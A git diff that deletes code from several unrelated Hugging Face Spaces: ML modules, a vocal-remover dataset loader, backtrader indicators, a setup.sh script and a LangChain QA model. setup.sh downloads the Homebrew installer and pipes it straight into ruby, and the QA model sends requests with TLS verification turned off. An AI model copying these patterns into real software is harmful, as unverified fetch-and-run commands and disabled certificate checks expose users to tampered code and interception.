more efficient in our CUDA implementation.") - - self.im2col_step = 128 - - self.d_model = d_model - self.n_levels = n_levels - self.n_heads = n_heads - self.n_points = n_points - - self.sampling_offsets = nn.Linear(d_model, n_heads * n_levels * n_points * 2) - self.attention_weights = nn.Linear(d_model, n_heads * n_levels * n_points) - self.value_proj = nn.Linear(d_model, d_model) - self.output_proj = nn.Linear(d_model, d_model) - - self._reset_parameters() - - def _reset_parameters(self): - constant_(self.sampling_offsets.weight.data, 0.) - thetas = torch.arange(self.n_heads, dtype=torch.float32) * (2.0 * math.pi / self.n_heads) - grid_init = torch.stack([thetas.cos(), thetas.sin()], -1) - grid_init = (grid_init / grid_init.abs().max(-1, keepdim=True)[0]).view(self.n_heads, 1, 1, 2).repeat(1, self.n_levels, self.n_points, 1) - for i in range(self.n_points): - grid_init[:, :, i, :] *= i + 1 - with torch.no_grad(): - self.sampling_offsets.bias = nn.Parameter(grid_init.view(-1)) - constant_(self.attention_weights.weight.data, 0.) - constant_(self.attention_weights.bias.data, 0.) - xavier_uniform_(self.value_proj.weight.data) - constant_(self.value_proj.bias.data, 0.) - xavier_uniform_(self.output_proj.weight.data) - constant_(self.output_proj.bias.data, 0.) 
- - def forward(self, query, reference_points, input_flatten, input_spatial_shapes, input_level_start_index, input_padding_mask=None): - """ - :param query (N, Length_{query}, C) - :param reference_points (N, Length_{query}, n_levels, 2), range in [0, 1], top-left (0,0), bottom-right (1, 1), including padding area - or (N, Length_{query}, n_levels, 4), add additional (w, h) to form reference boxes - :param input_flatten (N, \sum_{l=0}^{L-1} H_l \cdot W_l, C) - :param input_spatial_shapes (n_levels, 2), [(H_0, W_0), (H_1, W_1), ..., (H_{L-1}, W_{L-1})] - :param input_level_start_index (n_levels, ), [0, H_0*W_0, H_0*W_0+H_1*W_1, H_0*W_0+H_1*W_1+H_2*W_2, ..., H_0*W_0+H_1*W_1+...+H_{L-1}*W_{L-1}] - :param input_padding_mask (N, \sum_{l=0}^{L-1} H_l \cdot W_l), True for padding elements, False for non-padding elements - :return output (N, Length_{query}, C) - """ - N, Len_q, _ = query.shape - N, Len_in, _ = input_flatten.shape - assert (input_spatial_shapes[:, 0] * input_spatial_shapes[:, 1]).sum() == Len_in - - value = self.value_proj(input_flatten) - if input_padding_mask is not None: - value = value.masked_fill(input_padding_mask[..., None], float(0)) - value = value.view(N, Len_in, self.n_heads, self.d_model // self.n_heads) - sampling_offsets = self.sampling_offsets(query).view(N, Len_q, self.n_heads, self.n_levels, self.n_points, 2) - attention_weights = self.attention_weights(query).view(N, Len_q, self.n_heads, self.n_levels * self.n_points) - attention_weights = F.softmax(attention_weights, -1).view(N, Len_q, self.n_heads, self.n_levels, self.n_points) - # N, Len_q, n_heads, n_levels, n_points, 2 - if reference_points.shape[-1] == 2: - offset_normalizer = torch.stack([input_spatial_shapes[..., 1], input_spatial_shapes[..., 0]], -1) - sampling_locations = reference_points[:, :, None, :, None, :] \ - + sampling_offsets / offset_normalizer[None, None, None, :, None, :] - elif reference_points.shape[-1] == 4: - sampling_locations = reference_points[:, :, None, :, None, :2] \ - + sampling_offsets / self.n_points * reference_points[:, :, None, :, None, 2:] * 0.5 - else: - raise ValueError( - 'Last dim of reference_points must be 2 or 4, but get {} instead.'.format(reference_points.shape[-1])) - # try: - if torch.cuda.is_available(): - output = MSDeformAttnFunction.apply( - value, input_spatial_shapes, input_level_start_index, sampling_locations, attention_weights, self.im2col_step) - # except: - else: - # CPU - output = ms_deform_attn_core_pytorch(value, input_spatial_shapes, sampling_locations, attention_weights) - # # For FLOPs calculation only - # output = ms_deform_attn_core_pytorch(value, input_spatial_shapes, sampling_locations, attention_weights) - output = self.output_proj(output) - return output \ No newline at end of file diff --git a/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py b/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py deleted file mode 100644 index d5c005a6ad91e128c210e8ddb48310cad2bf6e8c..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py +++ /dev/null @@ -1,90 +0,0 @@ -import logging - -import torch -import torch.nn.functional as F -from tqdm import tqdm - -from open_clip import get_input_dtype, get_tokenizer -from open_clip.factory import HF_HUB_PREFIX -from .precision import get_autocast -from .zero_shot_classifier import build_zero_shot_classifier -from .zero_shot_metadata import CLASSNAMES, OPENAI_IMAGENET_TEMPLATES - - -def accuracy(output, target, topk=(1,)): - pred = output.topk(max(topk), 1, True, 
True)[1].t() - correct = pred.eq(target.view(1, -1).expand_as(pred)) - return [float(correct[:k].reshape(-1).float().sum(0, keepdim=True).cpu().numpy()) for k in topk] - - -def run(model, classifier, dataloader, args): - autocast = get_autocast(args.precision) - input_dtype = get_input_dtype(args.precision) - - with torch.no_grad(): - top1, top5, n = 0., 0., 0. - for images, target in tqdm(dataloader, unit_scale=args.batch_size): - images = images.to(device=args.device, dtype=input_dtype) - images = images.unsqueeze(2) - target = target.to(args.device) - - with autocast(): - # predict - output = model(image=images) - image_features = output['image_features'] if isinstance(output, dict) else output[0] - logits = 100. * image_features @ classifier - - # measure accuracy - acc1, acc5 = accuracy(logits, target, topk=(1, 5)) - top1 += acc1 - top5 += acc5 - n += images.size(0) - - top1 = (top1 / n) - top5 = (top5 / n) - return top1, top5 - - -def zero_shot_eval(model, data, epoch, args): - temp_val_d_cls_data = args.val_d_cls_data - args.val_d_cls_data = list(data.keys()) - assert len(args.val_d_cls_data) == 1 - args.val_d_cls_data = args.val_d_cls_data[0] - - if args.val_d_cls_data not in data: - return {} - if args.zeroshot_frequency == 0: - return {} - if (epoch % args.zeroshot_frequency) != 0 and epoch != args.epochs: - return {} - if args.distributed and not args.horovod: - model = model.module - - logging.info(f'Starting zero-shot {args.val_d_cls_data.upper()}.') - - logging.info('Building zero-shot classifier') - autocast = get_autocast(args.precision) - with autocast(): - tokenizer = get_tokenizer(HF_HUB_PREFIX+args.model, cache_dir=args.cache_dir) - # tokenizer = get_tokenizer("ViT-L-14") - classifier = build_zero_shot_classifier( - model, - tokenizer=tokenizer, - classnames=CLASSNAMES[args.val_d_cls_data], - templates=OPENAI_IMAGENET_TEMPLATES, - num_classes_per_batch=10, - device=args.device, - use_tqdm=True, - ) - - logging.info('Using classifier') - results = {} - if args.val_d_cls_data in data: - top1, top5 = run(model, classifier, data[args.val_d_cls_data].dataloader, args) - results[f'{args.val_d_cls_data}-zeroshot-val-top1'] = top1 - results[f'{args.val_d_cls_data}-zeroshot-val-top5'] = top5 - - logging.info(f'Finished zero-shot {args.val_d_cls_data.upper()}.') - - args.val_d_cls_data = temp_val_d_cls_data - return results diff --git a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py b/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py deleted file mode 100644 index cfd01a174978d97180a897e40cb59ecadec1d12e..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py +++ /dev/null @@ -1,183 +0,0 @@ -import os -import random - -import numpy as np -import torch -import torch.utils.data -from tqdm import tqdm - -from . 
import spec_utils - - -class VocalRemoverValidationSet(torch.utils.data.Dataset): - def __init__(self, patch_list): - self.patch_list = patch_list - - def __len__(self): - return len(self.patch_list) - - def __getitem__(self, idx): - path = self.patch_list[idx] - data = np.load(path) - - X, y = data["X"], data["y"] - - X_mag = np.abs(X) - y_mag = np.abs(y) - - return X_mag, y_mag - - -def make_pair(mix_dir, inst_dir): - input_exts = [".wav", ".m4a", ".mp3", ".mp4", ".flac"] - - X_list = sorted( - [ - os.path.join(mix_dir, fname) - for fname in os.listdir(mix_dir) - if os.path.splitext(fname)[1] in input_exts - ] - ) - y_list = sorted( - [ - os.path.join(inst_dir, fname) - for fname in os.listdir(inst_dir) - if os.path.splitext(fname)[1] in input_exts - ] - ) - - filelist = list(zip(X_list, y_list)) - - return filelist - - -def train_val_split(dataset_dir, split_mode, val_rate, val_filelist): - if split_mode == "random": - filelist = make_pair( - os.path.join(dataset_dir, "mixtures"), - os.path.join(dataset_dir, "instruments"), - ) - - random.shuffle(filelist) - - if len(val_filelist) == 0: - val_size = int(len(filelist) * val_rate) - train_filelist = filelist[:-val_size] - val_filelist = filelist[-val_size:] - else: - train_filelist = [ - pair for pair in filelist if list(pair) not in val_filelist - ] - elif split_mode == "subdirs": - if len(val_filelist) != 0: - raise ValueError( - "The `val_filelist` option is not available in `subdirs` mode" - ) - - train_filelist = make_pair( - os.path.join(dataset_dir, "training/mixtures"), - os.path.join(dataset_dir, "training/instruments"), - ) - - val_filelist = make_pair( - os.path.join(dataset_dir, "validation/mixtures"), - os.path.join(dataset_dir, "validation/instruments"), - ) - - return train_filelist, val_filelist - - -def augment(X, y, reduction_rate, reduction_mask, mixup_rate, mixup_alpha): - perm = np.random.permutation(len(X)) - for i, idx in enumerate(tqdm(perm)): - if np.random.uniform() < reduction_rate: - y[idx] = spec_utils.reduce_vocal_aggressively( - X[idx], y[idx], reduction_mask - ) - - if np.random.uniform() < 0.5: - # swap channel - X[idx] = X[idx, ::-1] - y[idx] = y[idx, ::-1] - if np.random.uniform() < 0.02: - # mono - X[idx] = X[idx].mean(axis=0, keepdims=True) - y[idx] = y[idx].mean(axis=0, keepdims=True) - if np.random.uniform() < 0.02: - # inst - X[idx] = y[idx] - - if np.random.uniform() < mixup_rate and i < len(perm) - 1: - lam = np.random.beta(mixup_alpha, mixup_alpha) - X[idx] = lam * X[idx] + (1 - lam) * X[perm[i + 1]] - y[idx] = lam * y[idx] + (1 - lam) * y[perm[i + 1]] - - return X, y - - -def make_padding(width, cropsize, offset): - left = offset - roi_size = cropsize - left * 2 - if roi_size == 0: - roi_size = cropsize - right = roi_size - (width % roi_size) + left - - return left, right, roi_size - - -def make_training_set(filelist, cropsize, patches, sr, hop_length, n_fft, offset): - len_dataset = patches * len(filelist) - - X_dataset = np.zeros((len_dataset, 2, n_fft // 2 + 1, cropsize), dtype=np.complex64) - y_dataset = np.zeros((len_dataset, 2, n_fft // 2 + 1, cropsize), dtype=np.complex64) - - for i, (X_path, y_path) in enumerate(tqdm(filelist)): - X, y = spec_utils.cache_or_load(X_path, y_path, sr, hop_length, n_fft) - coef = np.max([np.abs(X).max(), np.abs(y).max()]) - X, y = X / coef, y / coef - - l, r, roi_size = make_padding(X.shape[2], cropsize, offset) - X_pad = np.pad(X, ((0, 0), (0, 0), (l, r)), mode="constant") - y_pad = np.pad(y, ((0, 0), (0, 0), (l, r)), mode="constant") - - starts = 
np.random.randint(0, X_pad.shape[2] - cropsize, patches) - ends = starts + cropsize - for j in range(patches): - idx = i * patches + j - X_dataset[idx] = X_pad[:, :, starts[j] : ends[j]] - y_dataset[idx] = y_pad[:, :, starts[j] : ends[j]] - - return X_dataset, y_dataset - - -def make_validation_set(filelist, cropsize, sr, hop_length, n_fft, offset): - patch_list = [] - patch_dir = "cs{}_sr{}_hl{}_nf{}_of{}".format( - cropsize, sr, hop_length, n_fft, offset - ) - os.makedirs(patch_dir, exist_ok=True) - - for i, (X_path, y_path) in enumerate(tqdm(filelist)): - basename = os.path.splitext(os.path.basename(X_path))[0] - - X, y = spec_utils.cache_or_load(X_path, y_path, sr, hop_length, n_fft) - coef = np.max([np.abs(X).max(), np.abs(y).max()]) - X, y = X / coef, y / coef - - l, r, roi_size = make_padding(X.shape[2], cropsize, offset) - X_pad = np.pad(X, ((0, 0), (0, 0), (l, r)), mode="constant") - y_pad = np.pad(y, ((0, 0), (0, 0), (l, r)), mode="constant") - - len_dataset = int(np.ceil(X.shape[2] / roi_size)) - for j in range(len_dataset): - outpath = os.path.join(patch_dir, "{}_p{}.npz".format(basename, j)) - start = j * roi_size - if not os.path.exists(outpath): - np.savez( - outpath, - X=X_pad[:, :, start : start + cropsize], - y=y_pad[:, :, start : start + cropsize], - ) - patch_list.append(outpath) - - return VocalRemoverValidationSet(patch_list) diff --git a/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts b/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts deleted file mode 100644 index f6ae44ff0fd66ccd3f7feaa550025fbf2a83bf77..0000000000000000000000000000000000000000 --- a/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts +++ /dev/null @@ -1,7 +0,0 @@ -'use server' - -import { NextApiRequest, NextApiResponse } from 'next' - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - res.status(200).end('ok') -} diff --git a/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py b/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py deleted file mode 100644 index 956ad481e0f732769ffc59eeaa52e93a32ae0cff..0000000000000000000000000000000000000000 --- a/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8; py-indent-offset:4 -*- -############################################################################### -# -# Copyright (C) 2015-2020 Daniel Rodriguez -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -############################################################################### -from __future__ import (absolute_import, division, print_function, - unicode_literals) - -from . 
import Indicator, MovAv - - -class StandardDeviation(Indicator): - ''' - Calculates the standard deviation of the passed data for a given period - - Note: - - If 2 datas are provided as parameters, the 2nd is considered to be the - mean of the first - - - ``safepow`` (default: False) If this parameter is True, the standard - deviation will be calculated as pow(abs(meansq - sqmean), 0.5) to safe - guard for possible negative results of ``meansq - sqmean`` caused by - the floating point representation. - - Formula: - - meansquared = SimpleMovingAverage(pow(data, 2), period) - - squaredmean = pow(SimpleMovingAverage(data, period), 2) - - stddev = pow(meansquared - squaredmean, 0.5) # square root - - See: - - http://en.wikipedia.org/wiki/Standard_deviation - ''' - alias = ('StdDev',) - - lines = ('stddev',) - params = (('period', 20), ('movav', MovAv.Simple), ('safepow', True),) - - def _plotlabel(self): - plabels = [self.p.period] - plabels += [self.p.movav] * self.p.notdefault('movav') - return plabels - - def __init__(self): - if len(self.datas) > 1: - mean = self.data1 - else: - mean = self.p.movav(self.data, period=self.p.period) - - meansq = self.p.movav(pow(self.data, 2), period=self.p.period) - sqmean = pow(mean, 2) - - if self.p.safepow: - self.lines.stddev = pow(abs(meansq - sqmean), 0.5) - else: - self.lines.stddev = pow(meansq - sqmean, 0.5) - - -class MeanDeviation(Indicator): - '''MeanDeviation (alias MeanDev) - - Calculates the Mean Deviation of the passed data for a given period - - Note: - - If 2 datas are provided as parameters, the 2nd is considered to be the - mean of the first - - Formula: - - mean = MovingAverage(data, period) (or provided mean) - - absdeviation = abs(data - mean) - - meandev = MovingAverage(absdeviation, period) - - See: - - https://en.wikipedia.org/wiki/Average_absolute_deviation - ''' - alias = ('MeanDev',) - - lines = ('meandev',) - params = (('period', 20), ('movav', MovAv.Simple),) - - def _plotlabel(self): - plabels = [self.p.period] - plabels += [self.p.movav] * self.p.notdefault('movav') - return plabels - - def __init__(self): - if len(self.datas) > 1: - mean = self.data1 - else: - mean = self.p.movav(self.data, period=self.p.period) - - absdev = abs(self.data - mean) - self.lines.meandev = self.p.movav(absdev, period=self.p.period) diff --git a/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh b/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh deleted file mode 100644 index 751a9ac17c220deb476c5aef928f6b0d21d31c40..0000000000000000000000000000000000000000 --- a/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# Check if running on a supported system -case "$(uname -s)" in - Linux) - if [[ -f "/etc/lsb-release" ]]; then - . /etc/lsb-release - if [[ "$DISTRIB_ID" != "Ubuntu" ]]; then - echo "This script only works on Ubuntu, not $DISTRIB_ID." - exit 1 - fi - else - if [[ ! "$(cat /etc/*-release | grep '^ID=')" =~ ^(ID=\"ubuntu\")|(ID=\"centos\")|(ID=\"arch\")$ ]]; then - echo "Unsupported Linux distribution." - exit 1 - fi - fi - ;; - Darwin) - echo "Running on MacOS." - ;; - *) - echo "Unsupported operating system." - exit 1 - ;; -esac - -# Check if needed dependencies are installed and install if necessary -if ! command -v node >/dev/null || ! command -v git >/dev/null || ! 
command -v yarn >/dev/null; then - case "$(uname -s)" in - Linux) - if [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=ubuntu" ]]; then - sudo apt-get update - sudo apt-get -y install nodejs git yarn - elif [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=centos" ]]; then - sudo yum -y install epel-release - sudo yum -y install nodejs git yarn - elif [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=arch" ]]; then - sudo pacman -Syu -y - sudo pacman -S -y nodejs git yarn - else - echo "Unsupported Linux distribution" - exit 1 - fi - ;; - Darwin) - /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" - brew install node git yarn - ;; - esac -fi - -# Clone the repository and install dependencies -git clone https://github.com/Yidadaa/ChatGPT-Next-Web -cd ChatGPT-Next-Web -yarn install - -# Prompt user for environment variables -read -p "Enter OPENAI_API_KEY: " OPENAI_API_KEY -read -p "Enter CODE: " CODE -read -p "Enter PORT: " PORT - -# Build and run the project using the environment variables -OPENAI_API_KEY=$OPENAI_API_KEY CODE=$CODE PORT=$PORT yarn build -OPENAI_API_KEY=$OPENAI_API_KEY CODE=$CODE PORT=$PORT yarn start diff --git a/spaces/MWilinski/bot/api/question_answering/qa_model.py b/spaces/MWilinski/bot/api/question_answering/qa_model.py deleted file mode 100644 index 6700f2744d8926e05b290298ede0ea5cfa12639e..0000000000000000000000000000000000000000 --- a/spaces/MWilinski/bot/api/question_answering/qa_model.py +++ /dev/null @@ -1,269 +0,0 @@ -import os -import json -import requests -import subprocess -import torch -import transformers -from urllib.parse import quote -from typing import Mapping, Optional, List, Any -from huggingface_hub import snapshot_download -from transformers import AutoTokenizer, AutoModelForCausalLM -from langchain import PromptTemplate, HuggingFaceHub, LLMChain -from langchain.llms import HuggingFacePipeline -from langchain.llms.base import LLM -from langchain.embeddings import HuggingFaceEmbeddings, HuggingFaceHubEmbeddings, HuggingFaceInstructEmbeddings -from langchain.vectorstores import FAISS -from .mocks import MockLocalBinaryModel - -from api.logger import logger -from api.question_answering.response import Response - - -class LocalBinaryModel(LLM): - model_id: str = None - llm: None = None - - def __init__(self, model_id: str = None): - super().__init__() - from llama_cpp import Llama - - model_path = f'api/question_answering/{model_id}' - if not os.path.exists(model_path): - raise ValueError(f'{model_path} does not exist') - self.model_id = model_id - self.llm = Llama(model_path=model_path, n_ctx=4096) - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - prompt = f'Q: {prompt} A: ' - output = self.llm( - prompt, - max_tokens=1024, - stop=['Q:'], - echo=False - ) - output_text = output['choices'][0]['text'] - return output_text - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": self.model_id} - - @property - def _llm_type(self) -> str: - return self.model_id - - -class TransformersPipelineModel(LLM): - model_id: str = None - pipeline: str = None - - def __init__(self, model_id: str = None): - super().__init__() - self.model_id = model_id - - tokenizer = AutoTokenizer.from_pretrained(model_id) - model = AutoModelForCausalLM.from_pretrained( - model_id, - torch_dtype=torch.bfloat16, - trust_remote_code=True, - load_in_8bit=False, - device_map="auto", - resume_download=True, - ) - self.pipeline = transformers.pipeline( - "text-generation", - 
model=model, - tokenizer=tokenizer, - max_new_tokens=2048, - ) - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - output_text = self.pipeline(prompt)[0]['generated_text'] - output_text = output_text.replace(prompt+'\n', '') - return output_text - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": self.model_id} - - @property - def _llm_type(self) -> str: - return self.model_id - - -class APIServedModel(LLM): - model_url: str = None - debug: bool = None - - def __init__(self, model_url: str = None, debug: bool = None): - super().__init__() - if model_url[-1] == '/': - raise ValueError('URL should not end with a slash - "/"') - self.model_url = model_url - self.debug = debug - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - prompt_encoded = quote(prompt, safe='') - url = f'{self.model_url}/?prompt={prompt_encoded}' - if self.debug: - logger.info(f'URL: {url}') - try: - response = requests.get(url, timeout=1200, verify=False) - response.raise_for_status() - output_text = json.loads(response.content)['output_text'] - return output_text - except Exception as err: - logger.error(f'Error: {err}') - return f'Error: {err}' - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": f'model url: {self.model_url}'} - - @property - def _llm_type(self) -> str: - return 'api_model' - - - -class QAModel(): - """ - QAModel class, used for generating answers to questions. - - Args: - llm_model_id (str): The ID of the LLM model to be used. - embedding_model_id (str): The ID of the embedding model to be used. - index_repo_id (str): The ID of the index repository to be used. - run_locally (bool, optional): Whether to run the models locally or on the Hugging Face hub. Defaults to True. - use_docs_for_context (bool, optional): Whether to use relevant documents as context for generating answers. - Defaults to True. - use_messages_for_context (bool, optional): Whether to use previous messages as context for generating answers. - Defaults to True. - debug (bool, optional): Whether to log debug information. Defaults to False. - - Attributes: - use_docs_for_context (bool): Whether to use relevant documents as context for generating answers. - use_messages_for_context (bool): Whether to use previous messages as context for generating answers. - debug (bool): Whether to log debug information. - llm_model (Union[LocalBinaryModel, HuggingFacePipeline, HuggingFaceHub]): The LLM model to be used. - embedding_model (Union[HuggingFaceInstructEmbeddings, HuggingFaceHubEmbeddings]): The embedding model to be used. - prompt_template (PromptTemplate): The prompt template to be used. - llm_chain (LLMChain): The LLM chain to be used. - knowledge_index (FAISS): The FAISS index to be used. 
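A compact usage sketch may make the arguments listed above easier to follow. Everything identifier-like below is a placeholder (the API URL, the embedding model id, and the index repo id are not values shipped with this Space), and the import path simply mirrors the module path this file already uses for its own imports:

```python
# Illustrative sketch only; all ids/URLs below are placeholders.
from api.question_answering.qa_model import QAModel

model = QAModel(
    llm_model_id='api_models/http://localhost:8000',  # 'api_models/' prefix routes to APIServedModel
    embedding_model_id='hkunlp/instructor-large',      # example instructor-style embedding model
    index_repo_id='some-org/some-faiss-index',         # dataset repo holding the *.faiss / *.pkl index
    use_docs_for_context=True,
    num_relevant_docs=3,
    debug=True,
)

response = model.get_response('How do I resume an interrupted download?')
print(response.get_answer())
print(response.get_sources())
```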
- - """ - def __init__( - self, - llm_model_id: str, - embedding_model_id: str, - index_repo_id: str, - use_docs_for_context: bool = True, - add_sources_to_response: bool = True, - use_messages_for_context: bool = True, - num_relevant_docs: int = 3, - debug: bool = False - ): - super().__init__() - self.use_docs_for_context = use_docs_for_context - self.add_sources_to_response = add_sources_to_response - self.use_messages_for_context = use_messages_for_context - self.num_relevant_docs = num_relevant_docs - self.debug = debug - - if 'local_models/' in llm_model_id: - logger.info('using local binary model') - self.llm_model = LocalBinaryModel( - model_id=llm_model_id - ) - elif 'api_models/' in llm_model_id: - logger.info('using api served model') - self.llm_model = APIServedModel( - model_url=llm_model_id.replace('api_models/', ''), - debug=self.debug - ) - else: - logger.info('using transformers pipeline model') - self.llm_model = TransformersPipelineModel( - model_id=llm_model_id - ) - - prompt_template = \ - "### Instruction:\n" \ - "Give an answer that contains all the necessary information for the question.\n" \ - "If the context contains necessary information to answer question, use it to generate an appropriate response.\n" \ - "{context}\n### Input:\n{question}\n### Response:" - - prompt = PromptTemplate( - template=prompt_template, - input_variables=['question', 'context'] - ) - self.llm_chain = LLMChain(prompt=prompt, llm=self.llm_model) - - if self.use_docs_for_context: - logger.info(f'Downloading {index_repo_id}') - snapshot_download( - repo_id=index_repo_id, - allow_patterns=['*.faiss', '*.pkl'], - repo_type='dataset', - local_dir='indexes/run/' - ) - logger.info('Loading embedding model') - embed_instruction = "Represent the Hugging Face library documentation" - query_instruction = "Query the most relevant piece of information from the Hugging Face documentation" - embedding_model = HuggingFaceInstructEmbeddings( - model_name=embedding_model_id, - embed_instruction=embed_instruction, - query_instruction=query_instruction - ) - logger.info('Loading index') - self.knowledge_index = FAISS.load_local(f"./indexes/run/", embedding_model) - - - def get_response(self, question: str, messages_context: str = '') -> Response: - """ - Generate an answer to the specified question. - - Args: - question (str): The question to be answered. - messages_context (str, optional): The context to be used for generating the answer. Defaults to ''. - - Returns: - response (Response): The Response object containing the generated answer and the sources of information - used to generate the response. 
- """ - - response = Response() - context = 'Give an answer that contains all the necessary information for the question.\n' - relevant_docs = '' - if self.use_messages_for_context and messages_context: - messages_context = f'\nPrevious questions and answers:\n{messages_context}' - context += messages_context - if self.use_docs_for_context: - logger.info(f'Retriving documents') - relevant_docs = self.knowledge_index.similarity_search( - query=messages_context+question, - k=self.num_relevant_docs - ) - context += '\nExtracted documents:\n' - context += "".join([doc.page_content for doc in relevant_docs]) - metadata = [doc.metadata for doc in relevant_docs] - response.set_sources(sources=[str(m['source']) for m in metadata]) - - logger.info(f'Running LLM chain') - answer = self.llm_chain.run(question=question, context=context) - response.set_answer(answer) - logger.info(f'Received answer') - - if self.debug: - sep = '\n' + '-' * 100 - logger.info(sep) - logger.info(f'messages_contex: {messages_context} {sep}') - logger.info(f'relevant_docs: {relevant_docs} {sep}') - sources_str = '\n'.join(response.get_sources()) - logger.info(f"sources:\n{sources_str} {sep}") - logger.info(f'context len: {len(context)} {sep}') - logger.info(f'context: {context} {sep}') - logger.info(f'question len: {len(question)}') - logger.info(f'question: {question} {sep}') - logger.info(f'response: {response.get_answer()} {sep}') - return response diff --git a/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py b/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py deleted file mode 100644 index 49e32c9a128aeadc2044c362ff27f6a43f6d7815..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - -def maximum_path(neg_cent, mask): - """ numba optimized version. 
- neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py b/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py deleted file mode 100644 index 51acb3ec401d7647278a25537576a0fb1775d827..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py +++ /dev/null @@ -1,198 +0,0 @@ -import os -import re - -import cn2an -from pypinyin import lazy_pinyin, Style - -from text.symbols import punctuation -from text.tone_sandhi import ToneSandhi - -current_file_path = os.path.dirname(__file__) -pinyin_to_symbol_map = { - line.split("\t")[0]: line.strip().split("\t")[1] - for line in open(os.path.join(current_file_path, "opencpop-strict.txt")).readlines() -} - -import jieba.posseg as psg - - -rep_map = { - ":": ",", - ";": ",", - ",": ",", - "。": ".", - "!": "!", - "?": "?", - "\n": ".", - "·": ",", - "、": ",", - "...": "…", - "$": ".", - "“": "'", - "”": "'", - "‘": "'", - "’": "'", - "(": "'", - ")": "'", - "(": "'", - ")": "'", - "《": "'", - "》": "'", - "【": "'", - "】": "'", - "[": "'", - "]": "'", - "—": "-", - "~": "-", - "~": "-", - "「": "'", - "」": "'", -} - -tone_modifier = ToneSandhi() - - -def replace_punctuation(text): - text = text.replace("嗯", "恩").replace("呣", "母") - pattern = re.compile("|".join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub( - r"[^\u4e00-\u9fa5" + "".join(punctuation) + r"]+", "", replaced_text - ) - - return replaced_text - - -def g2p(text): - pattern = r"(?<=[{0}])\s*".format("".join(punctuation)) - sentences = [i for i in re.split(pattern, text) if i.strip() != ""] - phones, tones, word2ph = _g2p(sentences) - assert sum(word2ph) == len(phones) - assert len(word2ph) == len(text) # Sometimes it will crash,you can add a try-catch. 
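    # The two asserts above state this function's alignment contract:
    # word2ph[i] is the number of phonemes contributed by the i-th character of
    # the normalized text, so sum(word2ph) == len(phones) and
    # len(word2ph) == len(text) must both hold.
    # The padding that follows adds a "_" phone and a 0 tone at both ends,
    # which is why word2ph is also padded with a leading and trailing 1.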
